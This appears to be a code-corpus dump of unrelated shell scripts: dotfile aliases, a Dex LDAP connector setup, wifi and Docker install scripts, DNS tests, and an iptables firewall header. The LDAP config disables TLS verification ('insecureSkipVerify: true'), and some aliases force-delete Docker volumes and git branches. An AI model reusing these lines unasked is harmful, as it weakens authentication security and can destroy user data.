# `yarn search` ALIAS.
alias yarns='yarn search';
# `yarn test` ALIAS.
alias yarnt='yarn test';
# `yarn upgrade` ALIAS.
alias yarnu='yarn upgrade';
alias yarnui='yarn upgrade-interactive';
alias yarnuig='yarn global upgrade-interactive';
################################################################################
#
# APACHE
#
################################################################################
# alias startapache="sudo brew services start httpd"
# alias stopapache="sudo brew services stop httpd"
# alias restartapache="sudo brew services restart -k httpd"
alias startapache="sudo apachectl start"
alias stopapache="sudo apachectl -k stop"
alias restartapache="sudo apachectl -k restart"
################################################################################
#
# assh — ( Formerly, Advanced SSH Config )
#
################################################################################
alias assh="assh wrapper ssh"
################################################################################
#
# Brew Graph
#
################################################################################
alias brew-deps="brew deps --installed"
#alias brew-graph="brew graph --installed | dot -Tpng -ograph.png && open graph.png"
alias brew-graph="brew graph --installed --highlight-leaves | fdp -Tpng -ograph.png && open graph.png"
################################################################################
#
# Bundler
#
################################################################################
alias bi="bundle install"
alias be="bundle exec "
alias bu="bundle update"
alias bo="bundle open"
################################################################################
#
# DNSMASQ
#
################################################################################
alias startdnsmasq="sudo brew services start dnsmasq"
alias stopdnsmasq="sudo brew services stop dnsmasq"
alias restartdnsmasq="sudo brew services restart dnsmasq"
################################################################################
#
# DOCKER
#
################################################################################
alias dklc='docker ps -l' # LIST LAST DOCKER CONTAINER
alias dklcid='docker ps -l -q' # LIST LAST DOCKER CONTAINER ID
alias dklcip='docker inspect -f "{{.NetworkSettings.IPAddress}}" $(docker ps -l -q)' # GET IP OF LAST DOCKER CONTAINER
alias dkps='docker ps' # LIST RUNNING DOCKER CONTAINERS
alias dkpsa='docker ps -a' # LIST ALL DOCKER CONTAINERS
alias dki='docker images' # LIST DOCKER IMAGES
alias dkrmac='docker rm $(docker ps -a -q)' # DELETE ALL DOCKER CONTAINERS
alias dkrmlc='docker-remove-most-recent-container' # DELETE MOST RECENT (I.E., LAST) DOCKER CONTAINER
alias dkelc='docker exec -it `dklcid` bash' # ENTER LAST CONTAINER (WORKS WITH DOCKER 1.3 AND ABOVE)
# OS-SPECIFIC IMAGE CLEANUP.
case $OSTYPE in
darwin*|*bsd*|*BSD*)
alias dkrmui='docker images -q -f dangling=true | xargs docker rmi' # DELETE ALL UNTAGGED DOCKER IMAGES
;;
*)
alias dkrmui='docker images -q -f dangling=true | xargs -r docker rmi' # DELETE ALL UNTAGGED DOCKER IMAGES
;;
esac
# CLEANUP.
alias docker-clean-all='docker container stop $(docker container ls -a -q) && docker system prune -a -f --volumes'
alias docker-clean-containers='docker container stop $(docker container ls -a -q) && docker container rm $(docker container ls -a -q)'
alias docker-clean-unused='docker system prune --all --force --volumes'
################################################################################
#
# GIT
#
################################################################################
alias gitdelete='git branch | egrep -v "(master|staging|develop|release_candidate\*)" | xargs git branch -D'
################################################################################
#
# MONGO DATABASE
#
################################################################################
alias startmongo="mongod --dbpath ~/data/db --fork --logpath /dev/null"
alias stopmongo="mongo admin --eval 'db.shutdownServer()' > /dev/null"
################################################################################
#
# MYSQL DATABASE
#
################################################################################
##
# MariaDB
##
#alias startmysql="brew services start mariadb"
#alias stopmysql="brew services stop mariadb"
##
# MySQL
##
#alias startmysql="brew services start mysql"
#alias stopmysql="brew services stop mysql"
#alias restartmysql="brew services restart mysql"
##
# MySQL ( v5.7 )
##
alias startmysql="brew services start mysql@5.7"
alias stopmysql="brew services stop mysql@5.7"
alias restartmysql="brew services restart mysql@5.7"
################################################################################
#
# POSTGRESQL DATABASE
#
################################################################################
alias startpostgres="brew services start postgresql"
alias stoppostgres="brew services stop postgresql"
################################################################################
#
# MANAGING MULTIPLE AWS EKS CLUSTERS
#
################################################################################
alias eks-main-prod='export AWS_PROFILE=canvasprod && aws eks update-kubeconfig --name prod-eks && source <(kubectl completion bash)'
alias eks-main-int='export AWS_PROFILE=canvasprod && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash)'
alias eks-canvastest-int='export AWS_PROFILE=canvastest && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash)'
alias eks-canvastest-int-gc-dev='export AWS_PROFILE=canvastest && aws eks update-kubeconfig --name int-eks && source <(kubectl completion bash) && kubectl config set-context $(kubectl config current-context) --namespace gc-dev'
alias disco-aws='export AWS_PROFILE=gc-dev-disco';
# - - - - - - - - - - - - - - - - - - - -
# Code Editor + IDE
# - - - - - - - - - - - - - - - - - - - -
# Open .zshrc To Be Edited In Vs Code
alias change='code-insiders ~/.bashrc'
# Re-Run Source Command On .zshrc To Update Current Terminal Session With New Settings
alias update='source ~/.bashrc'
| true
|
1ac17b6f63676fa345080194bf44e1180e68e532
|
Shell
|
SoeldnerConsult/kubeflow-in-tkg-cluster
|
/install_script_files/ldap_connector_configuration_script.sh
|
UTF-8
| 1,249
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
function configure_dex_ldap_connector(){
host=$1
bindDN=$2
bindPW=$3
username_prompt=$4
baseDN=$5
username_attribute=$6
id_attribute=$7
email_attribute=$8
name_attribute=$9
#1. obtain actual auth config
kubectl get configmap dex -n auth -o jsonpath='{.data.config\.yaml}' > dex-config.yaml
#2. create new auth
cat << EOF >> dex-config.yaml
connectors:
- type: ldap
id: ldap
name: LDAP
config:
host: "$host"
#This is the user which has read access to AD
bindDN: "$bindDN"
#This is the password for the above account
bindPW: "$bindPW"
#What the user is going to see in Kubeflow
insecureSkipVerify: true
usernamePrompt: "$username_prompt"
userSearch:
#Which AD/LDAP users may access Kubeflow
baseDN: "$baseDN"
#This is the mapping I've talked about and I'll explain again
username: "$username_attribute"
idAttr: "$id_attribute"
emailAttr: "$email_attribute"
nameAttr: "$name_attribute"
EOF
#3 & 4 create dummy configmap and merge with actual
kubectl create configmap dex \
--from-file=config.yaml=dex-config.yaml \
-n auth --dry-run -oyaml | kubectl apply -f -
#5 reapply auth
kubectl rollout restart deployment dex -n auth
}
| true
|
25f8811018a37107e83daabf319f86913ec5b220
|
Shell
|
jhbsz/wifi-handler
|
/connect-wifi
|
UTF-8
| 885
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright (C) 2014 Ripple Cloud
# params
ssid=$1
security=$2
password=$3
ifaceid=0
echo "$ssid"
echo "$security"
echo "$password"
# disable existing wifi interfaces
while :; do
uci get wireless.@wifi-iface[$ifaceid] > /dev/null 2>&1
if [ $? = 0 ]; then
uci set wireless.@wifi-iface[$ifaceid].disabled=1
ifaceid=$(($ifaceid + 1))
else
break
fi
done
# add the new wifi-iface
uci add wireless wifi-iface
uci set wireless.@wifi-iface[-1].device=radio0
uci set wireless.@wifi-iface[-1].network=wan
uci set wireless.@wifi-iface[-1].mode=sta
uci set wireless.@wifi-iface[-1].ssid=$ssid
uci set wireless.@wifi-iface[-1].encryption=$security
uci set wireless.@wifi-iface[-1].key=$password
# remove eth0 interface from wan
uci delete network.wan.ifname
# commit changes
uci commit
# reload network
ubus call network reload
/sbin/wifi down
/sbin/wifi up
| true
|
218e56fea57664545e4219f9b40121966a074be9
|
Shell
|
m4rcu5nl/docker-pdns-recursor-alpine
|
/tests/bats/01-pdns-recursor.bats
|
UTF-8
| 709
| 3.015625
| 3
|
[] |
no_license
|
#!/usr/bin/env bats
setup(){
load test_helper
}
@test "Recursor answers to query over UDP" {
run dig +notcp +short @${PDNS_HOST} -t TXT test.localhost
[ "$status" -eq 0 ]
[ "$output" = '"Result"' ]
}
@test "Recursor answers to query over TCP" {
run dig +tcp +short @${PDNS_HOST} -t TXT test.localhost
[ "$status" -eq 0 ]
[ "$output" = '"Result"' ]
}
@test "Attempt to transfer zone fails" {
result="$(dig +tcp @${PDNS_HOST} AXFR www.m4rcu5.nl | grep -c '; Transfer failed.')"
[ "$result" -eq 1 ]
}
@test "Reload authorative and forwarded zones" {
run docker exec ${DOCKER_CONTAINER_NAME} rec_control reload-zones
[ "$status" -eq 0 ]
[ "$output" = "ok" ]
}
| true
|
8948a5ae8cd11b86723c28a6dcb58bef8ff20c80
|
Shell
|
jlagneau/git-submodules-to-subtree
|
/gitsmtost.sh
|
UTF-8
| 874
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# extract the list of submodules from .gitmodule
cat .gitmodules | while read i
do
if [[ $i == \[submodule* ]]; then
echo converting $i
# extract the module's prefix
mpath=$(echo $i | cut -d\" -f2)
# skip two lines
read i; read i;
# extract the url of the submodule
murl=$(echo $i|cut -d\= -f2|xargs)
# extract the module name
mname=$(basename $mpath)
# deinit the module
git submodule deinit $mpath
# remove the module from git
git rm -r --cached $mpath
# remove the module from the filesystem
rm -rf $mpath
# commit the change
git commit -m "Removed $mpath submodule"
# add the remote
git remote add -f $mname $murl
# add the subtree
git subtree add --prefix $mpath $mname master --squash
# fetch the files
git fetch $murl master
fi
done
git rm .gitmodules
| true
|
ac8f2badb83d737231e53a32cd1fc3bbafae51a6
|
Shell
|
dronemill/harmony-api
|
/dockerfile_fs/etc/my_init.d/uid.sh
|
UTF-8
| 651
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# http://chapeau.freevariable.com/2014/08/docker-uid.html
# if we don't have a UID to swich to, then get out
if [ -z "$EXEC_UID" ]; then exit; fi;
export ORIGPASSWD=$(cat /etc/passwd | grep $EXEC_UNAME)
export ORIG_UID=$(echo $ORIGPASSWD | cut -f3 -d:)
export ORIG_GID=$(echo $ORIGPASSWD | cut -f4 -d:)
export EXEC_UID=${EXEC_UID:=$ORIG_UID}
export EXEC_GID=${EXEC_GID:=$ORIG_GID}
ORIG_HOME=$(echo $ORIGPASSWD | cut -f6 -d:)
sed -i -e "s/:${ORIG_UID}:${ORIG_GID}:/:${EXEC_UID}:${EXEC_GID}:/" /etc/passwd
sed -i -e "s/${EXEC_UNAME}:x:${ORIG_GID}:/${EXEC_UNAME}:x:${EXEC_GID}:/" /etc/group
chown -R ${EXEC_UID}:${EXEC_GID} ${ORIG_HOME}
| true
|
411f5db325b17266a44b5fc31bf885a9caf91166
|
Shell
|
o1-labs/graphql_ppx
|
/bzl/tools/wss
|
UTF-8
| 363
| 3.46875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
for LAST; do true; done
ARGS=
for param in "$@"
do
echo COUNT: $#
if [ $# -ne 1 ]
then
ARGS="$ARGS $1"
fi
shift
done
# if no dir arg is passed:
if [[ $LAST == -* ]]
then
ARGS="$ARGS $LAST"
LAST=
fi
ls --color $ARGS `bazel info output_base`/external/$LAST
echo OUTPUT_BASE: `bazel info output_base`/external/$LAST
| true
|
3271d8359c63bf9a29430fe6981f7344a03faad8
|
Shell
|
sotoiwa/vagrant-was-centos
|
/unzip_repo.sh
|
UTF-8
| 627
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
set -eu
set -o pipefail
function unziprepo () {
repo=$1
filename=${!repo}
mkdir -p /work/${repo}
cd /work/${repo}
cp /vagrant/${filename} .
unzip -q ${filename}
}
IIM=agent.installer.linux.gtk.x86_64_1.8.9004.20190423_2015.zip
WAS=WAS_ND_V9.0_MP_ML.zip
JDK=sdk.repo.8030.java8.linux.zip
IHS=was.repo.9000.ihs.zip
PLG=was.repo.9000.plugins.zip
WAS_FP=9.0.0-WS-WAS-FP011.zip
JDK_FP=ibm-java-sdk-8.0-5.35-linux-x64-installmgr.zip
IHSPLG_FP=9.0.0-WS-IHSPLG-FP011.zip
unziprepo IIM
unziprepo WAS
unziprepo JDK
unziprepo IHS
unziprepo PLG
unziprepo WAS_FP
unziprepo JDK_FP
unziprepo IHSPLG_FP
| true
|
56df9ba41b8d65b305aaa7f3133534e0947ca8d8
|
Shell
|
Zo3i/OCS
|
/docker/dockerInstall.sh
|
UTF-8
| 1,219
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
### 更新 ###
yum -y update
### 安装docker ###
# 安装一些必要的系统工具
sudo yum install -y yum-utils device-mapper-persistent-data lvm2
# 添加软件源信息
sudo yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo
# 更新 yum 缓存
sudo yum makecache fast
# 安装 Docker-ce
sudo yum -y install docker-ce
# 启动docker并设置为开机启动(centos7)
systemctl start docker.service
systemctl enable docker.service
# 替换docker为国内源
echo '{"registry-mirrors": ["https://registry.docker-cn.com"],"live-restore": true}' > /etc/docker/daemon.json
systemctl restart docker
# 安装dokcer-compose
sudo curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
# 安装命令补全工具
yum -y install bash-completion
curl -L https://raw.githubusercontent.com/docker/compose/$(docker-compose version --short)/contrib/completion/bash/docker-compose > /etc/bash_completion.d/docker-compose
### 安装docker结束 ###
###给当前用户授权
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
| true
|
6177d3085ca14bc0b17afce37fcd880f821fd05c
|
Shell
|
kevyin/ngsane
|
/mods/old/dindelMerge.sh
|
UTF-8
| 2,908
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Script running dindel on a bam file containing the reads from several individuals
# It requires the candidate indels from a prior dindel run on the bamfiles for each
# individual seperately.
# author: Denis C. Bauer
# date: Jan.2011
#INPUTS
NGSANE_BASE=$1 # location of the NGSANE repository
FILE=$2 # bam files
CANDIDATES=$3 # candidate regions from the seperate run
FASTA=$4 # reference genome
OUT=$5 # output dir
#PROGRAMS
. ${NGSANE_BASE}/conf/header.sh
#PARAMETERS
WINDOWS=1000
echo ">>>>> indel calling with DINDEL simultaneously"
echo ">>>>> startdate "`date`
echo ">>>>> dindelMerge.sh $NGSANE_BASE $FILE $CANDIDATES $FASTA $OUT"
# delete privious output files
if [ -e $OUT/genotype.dindel.vcf ]; then
rm $OUT/genotype.dindel.vcf
fi
# make dir
if [ ! -d $OUT/dindelWindow ]; then
mkdir $OUT/dindelWindow
fi
samp=12
# get library size
echo "********* get library size"
$DINDELHOME/binaries/dindel-1.01-linux-64bit --analysis getCIGARindels --bamFile $FILE \
--outputFile $FILE.dindel --ref $FASTA --maxRead 100000 #--region 229994688-230071581 --tid chr1
# #combine the variants from the previous run
# cat $FILE.dindel.variants.txt $CANDIDATES > $FILE.dindel.ext.variants.txt
# make windows
echo "********* make windows"
$DINDELHOME/dindel-1.01-python/makeWindows.py \
--inputVarFile $FILE.dindel.variants.txt \
--windowFilePrefix $OUT/dindelWindow/genotype.realWind \
--numWindowsPerFile $WINDOWS
#get indels
#
#@Kees: this is where the problem occurs
echo "********* get indels"
for i in $( ls $OUT/dindelWindow/genotype.realWind* )
do
echo "prozess $i"
$DINDELHOME/binaries/dindel-1.01-linux-64bit --analysis indels --doPooled \
--bamFile $FILE --ref $FASTA --quiet --maxRead 100000 \
--varFile $FILE.dindel.libraries.txt \
--libFile $OUT/ \
--outputFile ${i/realWind/stage2_realWind}
done
ls $OUT/dindelWindow/genotype*.glf.txt > $OUT/dindelWindow/genotype.stage2.outputfiles.txt
exit
# merge into a VCF file
echo "********* merge"
$DINDELHOME/dindel-1.01-python/mergeOutputPooled.py --numSamples $samp --numBAMFiles $samp \
--inputFiles $OUT/dindelWindow/genotype.stage2.outputfiles.txt\
--outputFile $OUT/genotype.dindel.vcf --ref $FASTA
# get individual genotypes
echo "********* get individual genotypelikelyhoods"
$DINDELHOME/dindel-1.01-python/makeGenotypeLikelihoodFilePooled.py \
--inputGLFFiles ${i/realWind/stage2_realWind} \
--callFile $OUT/genotype.dindel.vcf \
--bamFiles $FILES \
--outputFile $OUT/genotype.dindel.glf
#clean up
#rm $OUT/genotype.dindel.variants.txt
#rm $OUT/genotype.dindel.libraries.txt
#rm $OUT/dindelWindow/genotype.stage2"_"realWind.*
#rm $OUT/dindelWindow/genotype.realWind*
#rm $OUT/dindelWindow/genotype".staget2.outputfiles.txt"
#rm bamFilePaths.txt
echo ">>>>> indel calling with DINDEL - FINISHED"
echo ">>>>> enddate "`date`
| true
|
a764d999e669d3a5d3fdc15b5d26fb4aa974386d
|
Shell
|
williamhbell/BashIntro
|
/bin/example_04.sh
|
UTF-8
| 247
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# W. H. Bell
# A program to demonstrate while and until loops
#
nloops=3
i=0
echo "while loop"
while [[ $i<$nloops ]]; do
echo $i
let i++
done
echo
echo "until loop"
i=0
until [[ $i>$nloops ]]; do
echo $i
let i++
done
| true
|
98ca8c3fa8f7afa1dcfa6293c3efcfe27902b27c
|
Shell
|
whit2333/bubble_chamber
|
/bin/run_bubble_sim
|
UTF-8
| 355
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
piped_args=
if [ -p /dev/stdin ]; then
# If we want to read the input line by line
while IFS= read line; do
echo "Line: ${line}"
if [ -z "$piped_args" ]; then
piped_args="${line}"
else
piped_args="${piped_args}\n${line}"
fi
done
fi
source /usr/local/bin/geant4.sh
echo -e ${piped_args} | bubble_chamber $@
| true
|
022e7de983280fdcb31538507369477b132a1e20
|
Shell
|
henrysher/fedora-infra-ansible
|
/roles/people/files/grab-daily-logs.sh
|
UTF-8
| 993
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# skvidal - 2013-06-25
# takes 2 args: grep_search_string subdir_to_write_to
# ex: bash grab-daily-logs.sh /repos/openstack/ rdo
logpath='/var/log/httpd/'
basedest="/srv/people/site/accesslogs/"
logfn='fedorapeople.org-access.log'
search="$1"
destpath="$basedest/$2"
dstamp=`date -d yesterday +%Y-%m-%d`
# basedest
if [ ! -d $basedest ]; then
mkdir -p $basedest
chown apache.apache $basedest
chmod 770 $basedest
fi
#make sure there is an index.html up one so you can't find it
if [ ! -f $basedest/index.html ]; then
echo "nothing to see" > $basedest/index.html
chmod 664 $basedest/index.html
fi
#make the destpath
if [ ! -d $destpath ]; then
mkdir -p $destpath
chown apache.apache $destpath
chmod 770 $destpath
fi
# grab the logs
grep $search $logpath/${logfn}-${dstamp} >> ${destpath}/${dstamp}.log
chown apache.apache $destpath/${dstamp}.log
chmod 640 $destpath/${dstamp}.log
# clean up the old logs
/usr/sbin/tmpwatch -f 720 -m $destpath
| true
|
abe575e131896c42c45e25bc02c0981351dea354
|
Shell
|
z3an/cifs-samba4.5.1
|
/build.sh
|
UTF-8
| 229
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
cd $(dirname $0)
DO_PUSH="$1"
if [ "${DO_PUSH}" != "--push" ]; then
if [ ! -e ./dist ]; then
mkdir -p ./dist
fi
rm -rf ./dist/*
fi
./scripts/build-image $DO_PUSH
| true
|
22e1f8fee8e8361c2e6d536acf724c18dc4d22ee
|
Shell
|
HoweyHuo/UbuntuSetupResources
|
/rc.firewall/rc.firewall
|
ISO-8859-2
| 57,135
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# -- 435 ---------------------------------------------------------------|
# This is it...MonMotha's Firewall 2.3.8-pre9! |
# I wrote a firewall and all I got was this cheesy tagline |
# ----------------------------------------------------------------------|
# 2.3 RELEASE NOTES: This is the 2.2 series with some extra stuff, |
# including MAC address matching, stateful matching, port forwarding, |
# per-proto accept behavior, and some other stuff that I might think |
# about adding later. |
# ----------------------------------------------------------------------|
# COMMENTS from MonMotha: |
# |
# Please do not email me directly with usage questions. I don't have |
# the time or resources to keep up. Check the configuration help at |
# the URL posted below then post to the users list if you have any |
# further questions. |
# --MonMotha |
# |
# When emailing me or the mailing lists, keep in mind that HTML email |
# may be silently rejected as an anti-spam measure. Configure your UA |
# to use plain text for mail. |
# --MonMotha |
# |
# A list of known bugs can be found at: |
# http://www.mplug.org/phpwiki/index.php?MonMothaKnownBugs |
# please check this list before reporting bugs. Bugs can be reported |
# directly to me or to the devel mailing list. Please ask to be CCed |
# if you mail the devel list and are not a member. |
# --MonMotha |
# |
# Mailing lists are now available. See the distribution website at |
# <http://monmotha.mplug.org> for more info. |
# --MonMotha |
# |
# Note another change of my email address. New address is: |
# <monmotha@indy.rr.com>. Hopefully I can keep this one for a while. |
# --MonMotha |
# |
# I will be entering "feature freeze" when 2.3.8 goes final. Please |
# make sure to have any patches or feature requests in by then. |
# I expect 2.3.7 to be closing in on deserving the "stable" marking. |
# --MonMotha |
# |
# Please note the change of my e-mail address. The new address is: |
# obi-wan@starwarsfan.com. The old address (bvmopen@usa.net) will be |
# discontinued as of July 31, 2001. |
# --MonMotha |
# |
# When e-mailing to report a bug, please check first that it has not |
# already been fixed in the next prerelease (which can be found at the |
# distribution site). |
# --MonMotha |
# |
# Before e-mailing me, please check the distribution site (which can be |
# found at http://freshmeat.net/projects/mothafirewall as it changes |
# sometimes) for a new version. |
# --MonMotha |
# |
# Please...PLEASE give me feedback on your experiences with this script |
# I would really like to know what everyone wants, what works, and |
# about the inevitable bugs present in anything. |
# |
# Direct all feedback to: monmotha@indy.rr.com |
# --MonMotha |
# |
# When e-mailing with problems, please include firewall script version, |
# iptables version, kernel version, and GNU BASH version. If you think |
# your problem might be related to kernel configuration, please attach |
# the .config file for your kernel. |
# --MonMotha |
# |
# ----------------------------------------------------------------------|
# SYSTEM REQUIREMENTS: You must have either compiled the appropriate |
# iptables support into your 2.4 kernel or have loaded all the |
# applicable modules BEFORE you run this script. This script will not |
# load modules for you. |
# |
# You will need (at least) the following kernel options to use |
# this firewall: CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, |
# CONFIG_IP_NF_FILTER, CONFIG_IP_NF_MATCH_STATE and |
# CONFIG_IP_NF_TARGET_REJECT. |
# To use the masquerading you will also need (at least): |
# CONFIG_IP_NF_CONNTRACK, CONFIG_IP_NF_NAT, CONFIG_IP_NF_NAT_NEEDED |
# and CONFIG_IP_NF_TARGET_MASQUERADE. |
# Additional options may be needed to use other features. |
# |
# You need iptables. Get it at "http://netfilter.filewatcher.org". |
# Some of the features will need patches only present in the CVS |
# |
# This script was written (and partially tested) with iptables CVS |
# and kernel 2.4.x (non testing) in mind. |
# |
# Also, this is a BASH shell script...any 2.x version of GNU BASH |
# should work. |
# ----------------------------------------------------------------------|
# |
# ALL USERS, READ THE FOLLOWING: |
# |
# This is distributed under the BSD liscense sans advertising clause: |
# |
# Redistribution and use in source and binary forms, with or without |
# modification, are permitted provided that the following conditions |
# are met: |
# |
# 1.Redistributions of source code must retain the above copyright |
# notice, this list of conditions and the following disclaimer. |
# 2.Redistributions in binary form must reproduce the above |
# copyright notice, this list of conditions and the following |
# disclaimer in the documentation and/or other materials provided |
# with the distribution. |
# 3.The name of the author may not be used to endorse or promote |
# products derived from this software without specific prior |
# written permission. |
# |
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR |
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED |
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE |
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY |
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL |
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE |
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS |
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER |
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR |
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN |
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE |
# |
# While this may be used freely for commercial use, I do REQUEST that |
# any commercial users please tell me via e-mail at |
# monmotha@indy.rr.com that they are using it, why they chose it, |
# how well it works, etc. |
# |
# ----------------------------------------------------------------------|
# IMPORTANT: This firewall is currently in beta! It may be too |
# restrictive or insecure. |
# ----------------------------------------------------------------------|
# CHANGELOG: (Since 2.3.0-pre1a only) |
# version 2.3.8-pre9: Correct typo in config help wiki |
# Re-order FILTER_CHAINS for TREJECT change |
# rp_filter support multiple INET interfaces |
# version 2.3.8-pre8: Fix typo in ULREJECT chain creation status |
# Remove one-liner config help - use wiki |
# version 2.3.8-pre8b: Show liscense on unconfigured run |
# Experimental multiple internet devices |
# -Breakage of DMZ guaranteed |
# version 2.3.8-pre8a: LTREJECT jump to TREJECT after logging |
# Fix transparent proxy when on masqed LAN; |
# See discussion list archives for Jun |
# 2002 for more info |
# Clarify source route messages |
# version 2.3.8-pre7: Fix syntax error in ALLOW_HOSTWISE_PROTO |
# version 2.3.8-pre7b: More sanity checking |
# LOCIP option for DENY_HOSTWISE options |
# LOCIP option for DENY_ALL |
# version 2.3.8-pre7a: Clarify liscense |
# Alias TCP_ALLOW and UDP_ALLOW to |
# ALLOW_HOSTWISE_xxx as they contain |
# redundant code |
# Move BAD_ICMP to non-experimental options |
# Changed exit status; review your scripts |
# Additional sanity checking |
# Add ALLOW_HOSTWISE_PROTO option |
# version 2.3.8-pre6: Fix comment errors |
# Fix a bug in config checks |
# Add BRAINDEAD_ISP option |
# version 2.3.8-pre5: More fixes for multiple LAN interfaces |
# Fix a syntax error in ALLOW_HOSTWISE_TCP |
# version 2.3.8-pre5d: Intersubnet Routing should work again |
# TOS Mangles default to off |
# version 2.3.8-pre5c: Port forwards apply to all interfaces only |
# when LOCIP is used |
# Multiple LAN Interfaces (breaks DMZ) |
# version 2.3.8-pre5b: Fix missing fi near line 1160 |
# version 2.3.8-pre5a: Fix BAD_ICMP and echo-request |
# Fix port forwards |
# Add checks for limit and REJECT |
# Local IP options for TCP/UDP allows (and |
# hostwise allows) |
# Port forwards now apply to all interfaces |
# Remove redundant disclaimer |
# version 2.3.8-pre4: Fix typo in SUPER_EXEMPT |
# Fix reversal of DMZIN/OUT |
# Fix reversed logic in port forwards |
# version 2.3.8-pre3: Fix DHCP server syntax error |
# Replace ALLOW_ALL with SUPER_EXEMPT |
# Fix ALLOW_OUT_TCP |
# Fix SNAT status reporting |
# Removed some obsoleted code |
# Move DHCP server to stable options |
# Add local IP to port forwards |
# version 2.3.8-pre2: Don't create ULDROP unless used in case |
# system doesn't have ULOG support |
# ALLOW_OUT_TCP now allows a destination port |
# Additional sanity checks |
# Add ULREJECT and ULTREJECT targets |
# BLACKHOLEs should now work |
# Fix status reporting in local traffic rules |
# DMZ Fixes (Hans Bieshaar) |
# Flush and delete SYSTEST (Hans) |
# Syncookies set off if not on (Hans) |
# Fix REJECT messages for ICMP (Hans) |
# Explicit denies are now global (Hans) |
# Remove FORWARD -d $INTERNAL_LAN; it is not |
# needed for internet and can pose a |
# security risk (this may break things) |
# (Hans) |
# SYNCOOKIES default to off (Hans) |
# We had a debate on this one, feel free |
# to email me regarding it. |
# Config directives for RP_FILTER and |
# accept strict source routed (Hans) |
# Add BAD_ICMP directive |
# version 2.3.8-pre1: Add ULDROP (ULOG and DROP) target |
# Restructuring to allow the following: |
# BLACKHOLEs are now global (not just inet) |
# All explicit denies override TCP/UDP |
# forwards. |
# All explicit denies ovrride ALLOW_HOSTWISE |
# BLACKHOLEs should now work for computers |
# behind the firewall as well as the |
# firewall itself. |
# Fix for iptables 1.2.3 log level info |
# version 2.3.7: No changes from pre8 |
# version 2.3.7-pre8: Change email address on liscense |
# Revert to pre6 behavior of dropping ICMP |
# echo-request (take global DROP= policy) |
# Allow everything from interface lo |
# Correct pre7 changelog |
# Special rules for DHCP servers |
# version 2.3.7-pre7: Fix version number in changelog entry below |
# Fix 127.0.0.1 INPUT handling. |
# Only enable IP forwarding if it's needed |
# (INTERNAL_LAN defined) |
# Tweak flood parameters |
# Hostwise allows now override explicit, |
# denies but not blackholes |
# ICMP echo-request will no longer take the |
# specified drop policy when it doesn't |
# comply with limits, straight DROP will |
# be used instead |
# Fix REJECT handling in TREJECT and LTREJECT |
# Add transparent proxy support (Joshua Link) |
# version 2.3.7-pre6: Fix status reporting on SSR SysCtl loop |
# Fix the SSR SysCtl loop |
# Remove stateful match from forward chain |
# version 2.3.7-pre5: Make the default policy actually be DROP |
# instead of just saying it is |
# Add stateful matching to forward chain to |
# prevent people from routing onto your |
# internal network (please tell me if |
# breaks anything). Thanks to Martin |
# Mosny for noticing this |
# Block Source Routed Packets to help with |
# the above problem |
# Add option for TCP SynCookies on or off |
# Fix BLACKHOLE directive (was being applied |
# to INPUT/OUTPUT after the jump for |
# INETIN/INETOUT so didn't apply for |
# the internet). Thanks to Gerry Doris |
# for noticing this |
# Add DHCP client to default UDP port allows |
# Note email address change |
# Changed emphesis in comments |
# Forwarding of port ranges (Vinny and Eddie) |
# version 2.3.7-pre4: Line 414, missing subnet match caused all |
# packets from anywhere to be allowed. |
# Fixed. |
# version 2.3.7-pre3: Fix missing fi (fatal syntax error) |
# Fix logging in TCPACCEPT chain |
# version 2.3.7-pre2: Add route verification (thanks to Jeremy |
# Frank) |
# Add blackhole directive |
# Updated configuration sanity checks |
# Ripped out SSH Stuff as it isn't needed |
# True default DROP on INPUT |
# Don't run the INTERNAL_LAN loop if no nets |
# Upped the default SYN limit as large |
# numbers of small FTP transfers would |
# overload it quickly |
# Form cleanups |
# version 2.3.7-pre1: Maybe the FTP will work now (fixes for the |
# RELATED state) |
# Now works with both LAN and DMZ iface null |
# Moved static NAT to stable options |
# Change parser to /bin/bash not /bin/sh |
# version 2.3.6: Add TTL mangling |
# Added some more EFNet servers to the list |
# Fix in the DMZOUT chain |
# Fix FTP stuff |
# version 2.3.5: Fixes to make port forwarding work again |
# version 2.3.4: USE_MASQ has been changed to MASQ_LAN in port fw |
# Fix syntax error in TCP port forwards |
# General cleanup |
# Fixes in port forwarding |
# It's LTREJECT, not TLREJECT |
# More TOS mangling |
# version 2.3.3: Fatal syntax error in IP forward detect fix |
# Don't bail on no IP forward for no LAN |
